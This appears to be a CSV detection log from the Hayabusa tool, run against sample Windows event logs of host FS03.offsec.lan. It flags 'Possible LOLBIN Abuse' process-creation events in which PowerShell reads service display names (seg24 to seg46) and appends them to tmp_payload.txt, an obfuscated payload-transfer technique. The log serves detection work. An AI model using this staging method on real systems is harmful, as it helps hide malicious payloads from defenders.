+2021-11-03 17:35:01.557 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg24"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x888 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:01.557 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg24"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd08 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:03.010 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg25"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc10 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:03.026 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg25"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc80 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:04.458 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg26"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xeb0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:04.458 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg26"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf18 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:05.896 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg27"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc94 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:05.911 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg27"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xebc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:07.342 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg28"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1c8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:07.342 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg28"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xacc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:08.797 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg29"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x2ac | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:08.797 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg29"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa84 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:10.236 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg30"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6a4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:10.236 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg30"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x964 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:11.689 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg31"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xcfc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:11.689 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg31"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:13.147 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg32"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xad8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:13.147 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg32"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x990 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:14.607 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg33"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xde8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:14.623 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg33"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x944 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:16.065 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg34"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:16.080 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg34"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa14 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:17.549 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg35"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6fc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:17.565 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg35"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x474 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:19.048 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg36"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6b8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:19.048 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg36"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xafc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:20.564 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg37"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf00 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:20.564 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg37"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa80 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:22.050 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg38"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:22.050 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg38"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xec4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:23.508 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg39"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbe8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:23.508 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg39"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf1c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:24.966 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg40"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x254 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:24.966 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg40"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x580 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:26.426 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg41"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xba4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:26.426 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg41"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa60 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:27.882 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg42"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x2ac | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:27.882 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg42"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa6c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:29.330 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg43"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdd8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:29.346 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg43"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x964 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:30.829 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg44"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:30.829 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg44"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcfc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:32.282 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg45"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc6c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:32.282 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg45"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x22c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:33.739 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg46"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xee8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
